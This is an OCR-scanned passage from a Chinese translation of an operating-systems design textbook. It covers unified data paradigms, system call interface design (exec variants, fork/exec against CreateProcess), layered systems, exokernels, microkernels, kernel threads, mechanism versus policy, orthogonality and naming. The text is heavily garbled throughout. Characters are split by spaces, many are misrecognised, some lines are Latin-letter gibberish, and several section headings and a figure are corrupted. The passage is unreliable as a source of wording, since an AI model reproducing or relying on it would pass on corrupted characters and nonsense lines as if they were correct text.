象 。 一 有 旦 一 个 进程 获得 了 一 个 指向 文件 、 进 程 、 信 和 号 量 、 邮 箱 或 者 其 
他 内 核对 象 的 有 效 句 柄 ， 它 就 可 以 在 其 上 执行 操作 。 这 一 范 型 甚至 比 
UNIX 更 加 一 般 化 ， 并 且 比 FORTRAN 要 一 般 化 得 多 


统一 的 范 型 还 出 现在 其 他 上 下 文中 ， 其 中 在 这 里 值得 一 提 的 是 
Web。Web 背 后 的 范 型 是 充满 了 文档 的 超 空间 ， 每 一 个 文档 具有 一 个 
URL。 通 过 键入 一 个 URL 或 者 点 击 侦 URL 所 支持 的 条 目 ， 你 就 可 以 得 
到 该 文档 。 实 际 上 ， 许 多 “文档 ”根本 束 不 是 文档 ， 而 是 当 请 求 到 来 时 
由 程序 或 者 命令 行 解释 器 脚本 生成 的 。 例 如 ， 当 用 户 询问 一 家 网 上 商 
店 关 于 一 位 特定 艺术 家 的 CD 清单 时 ， 文 档 由 一 个 程序 即时 生成 ， 在 查 
询 未 做 出 之 前 该 文档 的 确 并 不 存在 。 


至 此 我 们 已 经 看 到 了 4 种 事例 ， 即 所 有 一 切 都 是 磁 珊 、 文 件 、 对 象 
或 者 文档 。 在 所 有 这 4 种 事例 中 ， 意 图 是 统一 数据 、 设 备 和 其 他 资源 ， 
从 而 使 它们 更 加 易于 处 理 。 每 一 个 操作 系统 都 应 该 具有 这 样 的 统一 数 


据 范 型 。 


13.2.3 系统 调用 接口 


如 果 一 个 人 相信 Corbat6 的 机 制 最 少 化 的 格言 ， 那 么 操作 系统 应 该 
提供 恰好 够 用 的 系统 调用 ， 并 且 每 个 系统 调用 都 应 该 尽 可 能 简单 (但 
不 能 过 于 简单 ) 。 统 一 的 数据 范 型 在 此 处 可 以 扮演 重要 的 角色 。 例 
如 ， 如 果 文 件 、 进 程 、IO 设 备 以 及 更 多 的 东西 都 可 以 看 作 是 文件 或 者 
对 象 ， 那 么 它们 束 都 能 够 用 单一 的 read 系 统 调用 来 读 取 。 否 则 ， 可 能 
束 有 必要 具有 read_file、read_proc 以 及 read_tty 等 单独 的 系统 调用 。 


在 某 些 情况 下 ， 系 统 调用 可 能 看 起 来 需要 奉 干 变 体 ， 但 是 通常 更 
好 的 实现 是 具有 处 理 一 般 情 况 的 一 个 系统 调用 ， 而 由 不 同 的 库 过 程 同 
程序 员 隐 藏 这 一 事实 。 例 如 ，UNIX 具 有 一 个 系统 调用 exec， 用 来 覆盖 
一 个 进程 的 虚拟 地 址 空间 。 最 一 般 的 调用 是 : 


exec(name,argp,envp); 


该 调用 加 载 可 执行 文件 name， 并 且 给 它 提 供 由 argp 所 指 加 的 参数 
和 envp 所 指 回 的 环境 变量 。 有 时 明确 地 列 出 参数 是 十 分 方便 的 ， 所 以 
库 中 包含 如 下 调用 的 过 程 : 


execl(name,arg0,argi,...,argn,0); 
execle(name,arg0,argi,...,argn,envp); 


所 有 这 些 过 程 所 做 的 事情 是 将 参数 粘连 在 一 个 数组 中 ， 然 后 调用 
exec 来 做 工作 。 这 一 安排 达到 了 双赢 目的 : 单一 的 直接 系统 调用 使 操 
作 系 统 保持 简单， 而 程序 员 得 到 了 以 各 种 方法 调用 exec 的 便利 。 


当然 ， 试 图 拥有 一 个 调用 来 处 理 每 一 种 可 能 的 情况 很 可 能 难以 控 
制 。 在 UNIX 中 ， 创 建 一 个 进程 需要 两 个 调用 : fork 然 后 是 exec， 前 者 
不 需要 参数 ， 后 者 具有 3 个 参数 。 相 反 ， 创 建 一 个 进程 的 Win32 API 调 
用 CreateProcess 具 有 10 个 参数 ， 其 中 一 个 参数 是 指向 一 个 结构 的 指 


针 ， 该 结构 具有 另外 18 个 参数 。 


很 久 以 前 ， 有 人 曾经 问 过 这 样 的 问题 : “如 果 我 们 省 略 了 这 些 东西 
会 不 会 发 生 可 怕 的 事情 ? ?诚实 的 回答 应 该 是 : “在 某 些 情况 下 程序 员 
可 能 不 得 不 做 更 多 的 工作 以 达到 特定 的 效果 ， 但 是 最 终 的 结 采 将 会 呈 
一 个 更 简单 、 更 小 巧 并 且 更 可 靠 的 操作 系统 。” 当 然 ， 主 张 10+18 个 参 
数 版 本 的 人 可 能 会 说 :“ 但 古 用 户 喜 欢 所 有 这 些 特性 。” 对 此 的 反驳 可 
能 会 是 :“ 他 们 更 加 喜欢 使 用 很 少 内 存 并 且 从 来 不 会 朋 江 的 系统 。” 在 
更 多 功能 性 和 更 多 内 存 代价 之 间 的 权衡 是 显而易见 的 ， 并 且 可 以 从 价 
格 上 来 衡量 (因为 内 存 的 价格 是 已 知 的 ) 。 然 而 ， 每 年 由 于 某 些 特性 
而 增加 的 月 并 次 数 是 难于 估算 的 ， 并 且 如 果 用 户 知道 了 隐藏 的 代价 是 
否 还 会 做 出 同样 的 选择 呢 ? 这 一 影响 可 以 在 Tanenbaum 软 件 第 一 定律 
中 做 出 总 结 : 


添加 更 多 的 代码 就 是 添加 更 多 的 程序 错误 。 


ASIN AS Bee EB BAN CAS, LC BAS E YY 
Ree ta tx ° HAS SDN SAARC FETE MAS aS DU ENT Fes PR RE 
要 么 是 计算 机 的 生 手 ， 要 么 就 是 相信 牙齿 仙女 《据说 会 在 儿童 掉 落 在 
枕 边 的 幼 齿 劳 放 上 钱财 的 仙女 ) 正在 那里 监视 着 他 们 。 


简单 不 是 设计 系统 调用 时 出 现 的 惟一 问题 。 一 个 重要 的 考虑 因素 
是 Lampson (1984) 的 口号 : 


不 要 隐藏 能 力 。 


如 果 硬 件 具 有 极其 高效 的 方法 做 某 事 ， 它 束 应 该 以 简单 的 方法 展 
种 给 程序 员 ， 而 不 应 该 掩埋 在 某 些 其 他 抽象 的 内 部 。 抽 象 的 目的 是 隐 
藏 不 合 需 要 的 特性 ， 而 不 古 隐藏 值得 需要 的 特性 。 例 如 ， 假 设 硬 件 具 
有 一 种 特殊 的 方法 以 很 高 的 速度 在 屏幕 上 (也 就 是 视频 RAM 中 ) 移动 
大 型 位 图 ， 正 确 的 做 法 是 要 有 一 个 新 的 系统 调用 能 够 得 到 这 一 机 制 ， 
而 不 是 只 提供 一 种 方法 将 视频 RAM 读 到 内 存 中 并 且 再 将 其 写 回 。 新 的 
系统 调用 应 该 只 是 移动 位 而 不 做 其 他 事情 。 如 有 果 系 统 调用 速度 很 快 ， 
用 户 总 可 以 在 其 上 建立 起 更 加 方便 的 接口 。 如 果 它 的 速度 慢 ， 没 有 人 
AERE” 


男 一 个 设计 问题 是 面 同 连接 的 调用 与 无 连接 的 调用 。 读 文件 的 标 
准 UNIX 系 统 调 用 和 Win32 系 统 调用 是 面向 连接 的 。 首 先 你 要 打开 一 个 
文件 ， 然 后 读 它 ， 最 后 关闭 它 。 某 些 远程 文件 访问 协议 也 是 面 同 连 接 


的 。 例 如 ， 要 使 用 FTP， 用 户 首先 要 登录 到 远程 计算 机 上 ， 读 文件 ， 
然后 注销 。 


另 一 方面 ， 某 些 远 程 文件 访问 协议 是 无 连接 的 ， 例 如 Web 协 议 
(HTTP) 。 要 读 一 个 web 页 面 你 只 要 请 求 它 就 可 以 了 ; 不 存在 事先 建 
立 连 接 的 需要 〈TCP 连 接 是 需要 的 ， 但 是 这 处 于 协议 的 低层 ; 访问 
Web 本 身 的 HTTP 协 议 是 无 连接 的 ) 。 


任何 面向 连接 的 机 制 与 无 连接 的 机 制 之 间 的 权衡 在 于 建立 连接 的 
机 制 (例如 打开 文件 要求 的 额外 开销 ， 以 及 在 后 续 调 用 (可 能 很 
多 ) 中 避免 进行 连接 所 带 来 的 好 处 。 对 于 单机 上 的 文件 WO 而 言 ， 由 于 
建立 连接 的 代价 很 低 ， 标 准 的 方法 (首先 打开 ， 然 后 使 用 ) 可 能 是 最 
好 的 方法 。 对 于 远程 文件 系统 而 言 ， 两 种 方法 都 可 以 采用 。 


与 系统 调用 接口 有 关 的 另 一 个 问题 是 接口 的 可 见 性 。POSIX 强 制 
的 系统 调用 列表 很 容易 找到 。 所 有 UNIX 系 统 都 支持 这 些 系 统 调用 ， 以 
及 少数 其 他 系统 调用 ， 但 是 完全 的 列表 总 是 公开 的 。 相 反 ，Microsoft 
从 未 将 Windows Vista 系 统 调用 列表 公开 。 作 为 奉 代 ，Win32 API 和 其 
他 API 被 公开 了 ， 但 是 这 些 API 包 含 大 量 的 库 调 用 (超过 10 000 个 ) ， 
只 有 很 少数 是 真正 的 系统 调用 。 将 所 有 系统 调用 公开 的 论据 是 可 以 让 
程序 员 知 道 什 么 是 代价 低廉 的 〈 在 用 户 空间 执行 的 函数 ) ， 什 么 是 代 
价 昂贵 的 (内核 调用 ) 。 不 将 它们 公开 的 论据 是 这 样 给 实现 提供 了 有 灵 
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工作 得 更 好 。 


13.3 ”实现 


看 过 用 户 界 面 和 系统 调用 接口 后 ， 现 在 让 我 们 来 看 一 看 如 何 实现 
一 个 操作 系统 。 在 下 面 8 个 小 方 ， 我 们 将 分 析 涉 及 实现 策略 的 某 些 一 般 
的 概念 性 问题 。 在 此 之 后 ， 我 们 将 看 一 看 某 些 低层 技术 ， 这 些 技术 通 
第 是 十 分 有 区 的 。 


13.3.1 ABZ 


实现 必须 要 做 出 的 第 一 个 决策 可 能 是 系统 结构 应 该 是 什么 。 我 们 
在 1.7 节 分 析 了 主要 的 可 能 性 ， 在 这 里 要 重 瘟 一 下 。 一 个 无 结构 的 单 块 
式 设计 实际 上 并 不 古 一 个 好 主意 ， 除 非 可 能 是 用 于 电 冰 箱 中 的 微小 的 
操作 系统 ， 但 是 即使 在 这 里 也 是 可 和 争论 的 。 


多 年 以 来 很 好 地 建立 起 来 的 一 个 合理 的 方案 是 分 层 系 统 。Dijkstra 
的 THE 系 统 (图 1-25) 是 第 一 个 分 层 操作 系统 。UNIX 和 Windows Vista 
也 具有 分 层 结构 ， 但 是 在 这 两 个 系统 中 分 层 更 是 一 种 试图 描述 系统 的 
方法 ， 而 不 是 用 于 建立 系统 的 真正 的 指导 原则 。 


对 于 一 个 新 系统 ， 选 择 走 这 一 路 线 的 设计 人 员 应 该 首 移 非常 仔细 
地 选择 各 个 层次 ， 并 且 定 义 每 个 层次 的 功能 。 撒 层 应 该 总 是 试图 隐藏 
硬件 最 粳 糕 的 特异 性 ， 就 像 图 11-7 中 HAL 所 做 的 那样 。 或 许 下 一 层 应 该 
处 理 中 断 、 上 下 文 切 换 以 及 MMU， 从 而 在 这 一 层 的 代码 大 部 分 是 与 机 
器 无 关 的。 在 这 一 层 之 上 ， 不 同 的 设计 人 员 可 能 具有 不 同 的 口味 (与 
偏好 ) 。 一 种 可 能 性 是 让 第 3 层 管 理 线程 ， 包 括 调 度 和 线程 间 同 步 ， 如 
图 13-2 所 示 。 此 处 的 思想 是 从 第 4 层 开 始 ， 我 们 拥有 适当 的 线程 ， 这 些 
线程 可 以 被 正常 地 调度 ， 并 且 使 用 标准 的 机 制 (例如 互 不 量 ) 进行 同 
步 。 


层次 

7 系统 调用 处 理 程序 

5 虚拟 内 存 

4 -| J | 
3 线程 、 线 程 调 度 、 线 程 同步 

2 中 断 处 理 、 上 下 文 切换 、MMU 


隐藏 低层 硬件 


一 人 


图 13-2 现代 分 层 操作 系统 的 一 种 可 能 的 设计 


在 第 4 层 ， 我 们 可 能 会 找到 设备 驱动 程序 ， 每 个 设备 驱动 程序 作为 
一 个 单独 的 线程 而 运行 ， 具 有 自己 的 状态 、 程 序 计数 器 、 寄 存 器 等 ， 
可 能 (但 是 不 必要 ) 处 于 内 核 地 址 空间 内 部 。 这 样 的 设计 可 以 大 大 简 
化 IO 结构 ， 因 为 当 一 个 中 断 发 生 时 ， 它 就 可 以 转化 成 在 一 个 互 斥 量 上 
的 unlock， 并 且 调 用 调度 器 以 (潜在 地 ) 调度 重新 就 绪 的 线程 ， 而 该 线 
程 曾 阻塞 在 该 互 斥 量 之 上 。MINIX 使 用 了 这 一 方案 ， 但 是 在 UNIX、 
Linux 和 Windows Vista 中 ， 中 断 处 理 程序 运行 在 一 类 “无 主 地 带 * 中 ， 而 
不 是 作为 适当 的 线程 可 以 被 调度 、 挂 起 等 。 由 于 任何 一 个 操作 系统 的 
大 多 数 复杂 性 在 于 MO 之 中 ， 使 其 更 加 易于 处 理 和 封装 的 任何 技术 都 是 
值得 考虑 的 。 


在 第 4 层 之 上 ， 我 们 预计 会 找到 虚拟 内 存 、 一 个 或 多 个 文件 系统 以 
及 系统 调用 接口 。 如 果 虚 拟 内 存 处 于 比 文件 系统 更 低 的 层次 ， 那 么 数 
据 块 高 速 缓存 就 可 以 分 页 出 去 ， 使 虚拟 内 存 管理 器 能 够 动态 地 决定 在 
用 户 页 面 和 内 核 页 面 (包括 高 速 缓存 ， 之 间 应 该 怎样 划分 实际 内 存 。 
Windows Vista 就 是 这 样 工作 的 。 


2. 外 内 核 


虽然 分 层 在 系统 设计 人 员 中 间 具 有 文 持 者 ， 但 是 还 有 为 一 个 阵营 
恰恰 持 有 相反 的 观点 (Engler 等 人 ，1995) 。 他 们 的 观点 基于 端 到 端的 
论据 (end-to-end argument) (Saltzer“# A, 1984) 。 这 一 概念 说 的 


是 ， 如 果 某 件 事情 必须 由 用 户 程序 本 身 去 完成 ， 在 一 个 较 低 的 层次 做 
同样 的 事情 束 古 浪费 。 


考虑 该 原理 对 于 远程 文件 访问 的 一 个 应 用 。 如 采 一 个 系统 担心 数 
据 在 传送 中 被 破坏 ， 它 应 该 安排 每 个 文件 在 写 的 时 候 计算 校 验 和 ， 并 
且 校 验 和 与 文件 一 同 存放 。 当 一 个 文件 通过 网 络 从 源 盘 传送 到 目标 进 
程 时 ， 校 验 和 也 被 传送 ， 并 且 在 接收 剖 重 新 计算 。 如 果 两 着 不 一 致 ， 
文件 将 被 丢弃 并 且 重 狐 传 送 。 


校 验 比 使 用 可 靠 的 网 络 协议 更 加 精确 ， 因 为 除了 位 传送 错误 以 
外 ， 它 还 可 以 捕获 磁盘 错误 、 内 存 错误 、 路 由 器 中 的 软件 错误 以 及 其 
他 错误 。 端 到 端的 论据 宣称 使 用 一 个 可 靠 的 网 络 协议 是 不 必要 的 ， 因 
为 端点 〈 接 收 进程 ) 拥有 足够 的 信息 以 验证 文件 本 身 的 正确 性 。 在 这 
一 观点 中 ， 使 用 可 徘 的 网 络 协议 的 惟一 原因 站 为 了 效率 ， 也 吏 是 六 ， 
更 早 地 捕 区 与 修复 传输 销 误 。 


问 到 器 的 论据 可 以 扩展 到 几乎 所 有 操作 系统 。 它 主张 不 要 让 操作 
系统 做 用 户 程序 本 吴 可 以 做 的 任何 事情 。 例 如 ， 为 什么 要 有 一 个 文件 
系统 ? 只 要 让 用 户 以 一 种 受 保护 的 方式 读 和 写 原始 磁盘 的 一 个 部 分 整 
可 以 了 。 当 然 ， 大 多 数 用 户 喜 欢 使 用 文件 ， 但 是 端 到 端的 论据 宣称 ， 
文件 系统 应 该 是 与 需要 使 用 文件 的 任何 程序 相 链接 的 库 过 程 。 这 一 方 
案 使 不 同 的 程序 可 以 拥有 不 同 的 文件 系统 。 这 一 论证 线索 表明 操作 系 
统 应 该 做 的 全 部 事情 是 在 竞争 的 用 户 之 间 安 全 地 分 配 资 源 〈 例 如 CPU 


和 磁盘 ) 。Exokernel 是 一 个 根据 端 到 端的 论据 建立 的 操作 系统 (Engler 


等 人 ，1995) 。 
3. 基 于 微 内 核 的 客户 -服务 器 系统 


在 让 操作 系统 做 每 件 事 情 和 让 操作 系统 什么 也 不 做 之 间 的 折 囊 十 
让 操作 系统 做 一 点 事情 。 这 一 设计 导致 微 内 核 的 出 现 ， 它 让 操作 系统 
的 大 部 分 作为 用 户 级 的 服务 器 进程 而 运行 ， 如 图 13-3 所 示 。 在 所 有 设计 
中 这 十 最 模块 化 和 最 灵活 的 。 在 灵活 性 上 的 极限 是 让 每 个 设备 张 动 程 
序 也 作为 一 个 用 户 进 程 而 运行 ， 从 而 完全 保护 内 核 和 其 他 驱动 程序 ， 
但 是 让 设备 驱动 程序 运行 在 内 核 会 增加 模块 化 程度 。 


客户 通过 加 服务 
器 进程 发 送信 息 
来 获得 服务 


A 13-3 基于 微 内 核 的 客户 -服务 郁 计 算 


当 设 备 驱 动 程序 运行 在 内 核 态 时 ， 可 以 直接 访问 硬件 设备 寄存 
器 ， 否 则 需要 某 种 机 制 以 提供 这 样 的 访问 。 如 有 果 硬 件 允许 ， 可 以 让 每 
个 驱动 程序 进程 仪 访问 它 需 要 的 那些 WO 设备 。 例 如 ， 对 于 内 存 映射 的 
I/O， 每 个 驱动 程序 进程 可 以 拥有 页 面 将 它 的 设备 映 冉 进 来 ,但 是 没有 


其 他 设备 的 页 面 。 如 末 IO 端 口 空间 可 以 部 分 地 加 以 保护 ， 束 可 以 保证 
只 有 相应 的 正确 部 分 对 每 个 驱动 程序 可 用 。 


即使 没有 硬件 帮助 可 用 ， 仍 然 可 以 设法 使 这 一 思想 可 行 。 此 时 需 
要 的 是 一 个 新 的 系统 调用 ， 该 系统 调用 仅 对 设备 驱动 程序 进程 可 用 ， 
它 提供 一 个 (端口 ， 取 值 ) 对 列表 。 内 核 所 做 的 是 首先 进行 检查 以 了 
解 进程 是 否 拥有 列表 中 的 所 有 并 口 ， 如 果 是 ， 它 束 将 相应 的 取 值 复制 
到 端口 以 发 起 设备 WO。 类似 的 调用 可 以 用 一 种 受 保护 的 方式 读 W/O 站 
O o 


这 一 方法 使 设备 驱动 程序 避免 了 检查 〈 并 且 破 坏 ) 内 核 数据 结 
构 ， 这 (在 很 大 程度 上 ) 是 一 件 好 事情 。 一 组 类 似 的 调用 可 以 用 来 让 
驳 动 程序 进程 读 和 写 内 核 表 格 ， 但 是 仅 以 一 种 党 控 的 方式 并 且 需 要 内 
核 的 批准 。 


这 一 方法 的 主要 问题 ， 并 且 一 般 而 言 是 针对 微 内 核 的 主要 问题 ， 
古人 额外 的 上 下 文 切换 导致 性 能 受到 影响 。 然 而 ， 微 内 核 上 的 所 有 工作 
实际 上 古 许 多 年 前 当 CPU 还 非 第 缓慢 的 时 候 做 的 。 如 今 ， 用 尽 CPU 的 
处 理 能 力 并 且 不 能 容忍 微小 性 能 损失 的 应 用 程序 是 十 分 稀少 的 。 综 
竟 ， 当 运行 一 个 字 处 理 器 或 Web 浏 览 器 时 ，CPU 可 能 有 95% 的 时 间 是 空 
内 的 。 如 果 一 个 基于 微 内 核 的 操作 系统 将 一 个 不 可 靠 的 3GHz 的 系统 转 
变 为 一 个 可 靠 的 2.5GHz 的 系统 ， 可 能 很 少 有 用 户 会 抱怨 。 上 毕竟， 仅仅 


在 几 年 以 前 当 他 们 得 到 具有 1GHz 的 速度 (就 当时 而 言 十 分 惊人 ) WA 
统 时 ， 大 多 数 用 户 是 相当 快乐 的 。 


4. 可 扩展 的 系统 


对 于 上 面 讨论 的 客户 -服务 着 系统 ， 思 想 是 让 尽 可 能 多 的 东西 脱离 
内 核 。 相 反 的 方法 旦 将 更 多 的 模块 放 到 内 核 中 ， 但 是 以 一 种 “ 受 保护 
的 ”方式 。 当 然 ， 这 里 的 关键 子 是 “ 受 保护 的 "。 我们 在 9.5.6 节 中 人 研究 了 
某 些 保 扩 机制， 这 些 机 制 最 初 打算 用 于 通过 Internet 引 入 小 程序 ,但 是 
对 于 将 外 来 的 代码 插入 到 内 核 中 的 过 程 同样 运用 。 最 重要 的 是 沙 使 技 
术 和 代码 签名 ， 因 为 解释 对 于 内 核 代码 来 说 实际 上 古 不 可 行 的 。 


当然 ， 可 扩展 的 系统 目 喘 并 不 是 构造 一 个 操作 系统 的 方法 。 然 
而 ， 通 过 以 一 个 只 是 包含 保护 机 制 的 最 小 系统 为 开端 ， 然 后 每 次 将 受 
保护 的 模块 添加 到 内 核 中 ， 直 到 达到 期 望 的 功能 ， 对 于 手边 的 应 用 而 
言 一 个 最 小 的 系统 就 建立 起 来 了 。 按 照 这 一 观点 ， 对 于 每 一 个 应 用 ， 
通过 仅仅 包含 它 所 需要 的 部 分 ， 束 可 以 裁剪 出 一 个 新 的 操作 系统 。 


Paramecium 就 是 这 类 系统 的 一 个 实例 (Van Doorn,2001) ° 


5. 内 核 线 程 


此 处 ， 另 一 个 相关 的 问题 是 系统 线程 ， 无 论 选择 哪 种 结构 模型 。 
有 时 允许 存在 与 任何 用 户 进程 相 隅 离 的 内 核 线程 是 很 方便 的 。 这 些 线 
程 可 以 在 后 台 运 行 ， 将 脏 页 面 写 入 人 磁 副 ， 在 内 存 和 磁盘 之 间 交 换 进 


程 ， 如 此 等 等 。 实 际 上 ， 内 核 本 身 可 以 完全 由 这 样 的 线程 构成 ， 所 以 
当 一 个 用 户 发 出 系统 调用 时 ， 用 户 的 线程 并 不 是 在 内 核 模式 中 运行 ， 
而 征 阻 塞 并 且 将 控制 传 给 一 个 内 核 线程 ， 该 内 核 线程 接管 控制 以 完成 

工作 。 


除了 在 后 全 运行 的 内 核 线程 以 外 ， 大 多 数 操作 系统 还 要 局 动 许 多 
守护 进程 。 虽 然 这 些 守护 进程 不 是 操作 系统 的 组 成 部 分 ， 但 是 它们 通 
党 执行 “系统 ”类 型 的 活动 。 这 些 活 动 包括 接收 和 发 送 电子 邮件 ， 并 且 
对 远程 用 户 各 种 各 样 的 请 求 进行 服务 ， 例 如 FTP 和 Web 网 页 。 


13.3.2 ”机 制 与 策略 


男 一 个 有 助 于 体系 结构 一 致 性 的 原理 十 机 制 与 策略 的 分 离 ， 该 原 
理 同时 还 有 助 于 使 系统 保持 小 型 和 良好 的 结构 。 通 过 将 机 制 放 入 操作 
系统 而 将 策略 留 给 用 户 进 程 ， 即 使 存在 改变 策略 的 需要 ， 系 统 本 里 也 
可 以 保持 不 变 。 即 使 策略 模块 必须 保留 在 内 核 中 ， 如 有 果 可 能 ， 它 也 应 
该 与 机 制 相 隔离 ， 这 样 策略 模块 中 的 变化 殊 不 会 影响 机 制 模块 。 


为 了 使 策略 与 机 制 之 间 的 划分 更 加 清晰 ， 让 我 们 考虑 两 个 现实 世 
界 的 例 于 。 第 一 个 例子 ， 考 虑 一 家 大 型 公司 ， 该 公司 拥有 人 负责 同 员 工 
发 放 薪 水 的 工资 部 门 。 该 部 门 拥有 计算 机 、 软 件 、 空 白文 票 、 与 银行 
的 契约 以 及 更 多 的 机 制 ， 以 便 准 确 地 发 出 薪水 。 然 而 ， 策 略 一 一 确定 
谁 将 获得 多 少 薪水 一 是 完全 与 机 制 分 开 的 ， 并 且 走 由 管理 部 门 决定 
的 。 工 资 部 门 只 是 做 他 们 被 吟 只 做 的 事情 。 


第 二 个 例子 ， 考 虑 一 家 饭店 。 它 拥有 提供 餐饮 的 机 制 ， 包 括 餐 
桌 、 和 餐具 、 服 务 员 、 充 满 设备 的 厨房 、 与 信用 卡 公司 的 氮 约 ， 如 此 等 
等 。 策 略 征 由 厨师 长 设 定 的 ， 也 融 是 说 ， 厨 师长 决定 菜单 上 有 什么 。 
如 有 条 厨师 长 决定 撤 掉 豆腐 换 上 和 牛排， 那么 这 一 新 的 策略 可 以 由 现 有 的 
机 制 来 处 理 。 


现在 让 我 们 考虑 某 些 操作 系统 的 例子 。 首 先 考 虑 线程 调度 。 内 核 
可 能 拥有 一 个 优先 级 调度 器 ， 具 有 k 个 优先 级 。 机 制 是 一 个 数组 ， 以 优 
先 级 为 索引 ， 如 图 10-11 或 图 11-19 所 示 。 每 个 数组 项 是 处 于 该 优先 级 
的 殴 绪 线程 列表 的 表 头 。 调 度 喜 只 是 从 最 高 优先 级 到 最 低 优 移 级 搜索 
数组 ， 选 中 它 找 到 的 第 一 个 线程 。 策 略 是 设 定 优 移 级 。 系 统 可 能 具有 
不 同 的 用 户 类 别 ， 每 个 类 别 拥有 不 同 的 优先 级 。 它 还 可 能 允许 用 户 进 
程 设置 其 线程 的 相对 优 移 级 。 优 先 级 可 能 在 完成 TO 之 后 增加 ， 或 者 在 
用 完 时 间 配 额 之 后 降低 。 还 有 众多 的 其 他 筑 略 可 以 遵循 ,但 是 此 处 的 
中 心思 想 是 设置 策略 与 执行 之 间 的 分 离 。 


第 二 个 例子 是 分 页 。 机 制 涉 及 到 MMU 管 理 ， 维 护 占 用 页 面 与 空闲 
页 面 的 列表 ， 以 及 用 来 将 页 面 移入 位 僵 或 者 移出 磁盘 的 代码 。 俩 略 走 
当 页 面 故 障 发 生 时 决定 做 什么 ， 它 可 能 是 局 部 的 或 全 局 的 ， 基 于 LRU 
的 或 基于 FIFO 的 ， 或 者 是 别 的 东西 ， 但 是 这 一 算法 可 以 (并 且 应 该 ) 
完全 独立 于 实际 管理 页 面 的 机 制 。 


第 三 个 例子 是 允许 将 模块 凌 载 到 内 核 之 中 。 机 制 天 心 的 是 它们 如 
何 被 插入 、 如 何 被 链接 、 它 们 可 以 发 出 什么 调用 ， 以 及 可 以 对 它们 发 
出 什么 调用 。 策 略 是 确定 允许 谁 将 模块 疼 载 到 内 核 之 中 以 及 装载 哪些 
模块 。 也 许 只 有 超级 用 户 可 以 闻 载 模块 ， 也 许 任 何 用 户 都 可 以 闭 载 被 
适当 权威 机 构 数字 签名 的 模块 。 


13.3.3” 正 交 性 


民 好 的 系统 设计 在 于 单独 的 概念 可 以 独立 地 组 合 。 例 如 ， 在 C 语 
言 中 ， 存 在 基本 的 数据 类 型 ， 包 括 整 数 、 字 符 和 浮 点 数 ， 还 存在 用 来 
组 合 数据 类 型 的 机 制 ， 包 括 数组 、 结 构 和 联合 。 这 些 概念 独立 地 组 
合 ， 人 允许 拥有 整数 数组 、 字 符 数 组 、 浮 点 数 的 结构 和 联合 成 员 等 。 实 
际 上 ， 一 旦 定义 了 一 个 新 的 数据 类 型 ， 如 整数 数组 ， 束 可 以 如 同一 个 
基本 数据 类 型 一 样 使 用 它 ， 例 如 作为 一 个 结构 或 者 一 个 联合 的 成 员 。 
独立 地 组 合 单独 的 概念 的 能 力 称 为 正 交 性 (orthogonality) ， 它 是 简单 
性 和 完整 性 原理 的 直接 结果 。 


正 交 性 概念 还 以 各 种 各 样 的 伪装 出 现在 操作 系统 中 ，Linux 的 
clone 系 统 调用 束 是 一 个 例子 ， 它 创建 一 个 新 线程 。 该 调用 有 一 个 位 图 
作为 参数 ， 它 允许 单独 地 共 至 或 复制 地 址 空间 、 工 作 目 隶 、 文 件 描述 
符 以 及 信号 。 如 采 复 制 所 有 的 东西 ， 我 们 将 得 到 一 个 进程 ， 束 像 调用 
fork 一 样 。 如 有 条 什么 都 不 复制 ， 则 是 在 当前 进程 中 创建 一 个 新 线程 。 
然而 ， 创 建 共 至 的 中 间 形 式 同 样 也 是 可 以 的 ， 而 这 在 传统 的 UNIX 系 统 
中 是 不 可 能 的 。 通 过 分 离 各 种 特性 并 且 使 它们 正 交 ， 是 可 以 做 到 更 好 
地 控制 目 由 度 的 。 


正 交 性 的 另 一 个 应 用 是 windows Vista 中 进程 概念 与 线程 概念 的 分 
离 。 进 程 是 一 个 资源 容 右 ， 既 不 多 也 不 少 。 线 程 是 一 个 可 调度 的 实 
体 。 当 把 男 一 个 进程 的 句柄 提供 给 一 个 进程 时 ， 它 拥有 多 少 个 线程 都 
征 没有 关系 的 。 当 一 个 线程 被 调度 时 ， 它 从 属于 哪个 进程 也 十 没有 关 


系 的 。 这 些 概念 是 正 交 的 。 


正 交 性 的 最 后 一 个 例子 来 自 UNIX。 在 UNIX 中 ， 进 程 的 创建 分 两 
步 完 成 : fork 和 exec。 创 建新 的 地 址 空间 与 用 新 的 内 存 映像 装载 该 地 址 
空间 是 分 开 的 ， 这 束 为 在 两 者 之 间 做 一 些 事情 提供 了 可 能 (例如 处 理 
文件 描述 符 ) 。 在 Windows Vista 中 ， 这 两 个 步骤 不 能 分 开 ， 也 就 是 
说 ， 创 建新 的 地 址 空间 与 填充 该 地 址 空间 的 概念 不 是 正 交 的 。Linux 的 
clone 加 exec 序 列 是 更 加 正 交 的 ， 因 为 存在 更 细 粒 度 的 构造 块 可 以 利 
用 。 作 为 一 般 性 的 规则 ， 拥 有 少量 能 够 以 很 多 方式 组 合 的 正 交 元 素 ， 
将 形成 小 巧 、 人 简单 和 精致 的 系统 。 


13.3.4 MÆ 


操作 系统 使 用 的 最 长 久 的 数据 结构 具有 某 种 类 型 的 名 字 或 标识 
符 ， 通 过 名 字 或 标识 符 束 可 以 引用 这 些 数 据 结构 。 显 而 易 见 的 例子 有 
注册 名 、 文 件 名 、 设 备 名 、 进 程 ID 等 。 在 操作 系统 的 设计 与 实现 中 ， 
如 何 构造 和 管理 这 些 名 字 是 一 个 重要 的 问题 。 


为 人 们 的 使 用 而 设计 的 名 字 是 ASCII 或 Unicode 形 式 的 字符 串 ， 并 
有 通常 是 层次 化 的 。 目 好 路 人 径 ， 例 如 /usr/ast/books/mos2/chap-12， 显 然 
是 层次 化 的 ， 它 指出 从 根 目 录 开 始 搜索 的 一 个 目录 序列 。URL 也 是 层 
次 化 的 。 例 如 ，www.cs.vu.nl/~ast/ 表 示 一 个 特定 国家 (nl) 的 一 所 特 
定 大 学 (vu) 的 一 个 特定 的 系 (cs) 内 的 一 台 特定 的 机 器 (www) ° 
和 斜 线 号 后 面 的 部 分 指出 的 是 目标 机 侣 上 的 一 个 特定 的 文件 ， 在 这 种 情 
形 中 ， 按 照 惯例 ， 该 文件 是 ast 主 目录 中 的 www/index.html。 注 意 URL 
(以 及 一 般 的 DNS 地 址 ， 包 括 电子 邮件 地 址 ) 是 “ 反 向 的 ”， 从 树 的 底 
部 开始 并 且 向 上 走 ， 这 与 文件 名 有 所 不 同 ， 后 者 从 树 的 顶部 开始 并 且 
向 下 走 。 看 得 这 一 问题 的 为 一 种 方法 是 从 头 写 这 棵 树 是 从 左 开 始 同 右 
走 ， 还 是 从 右 开始 同 左 走 。 


命名 经 党 在 外 部 和 内 部 两 个 层次 上 实现 。 例 如 ， 文 件 总 是 具有 子 
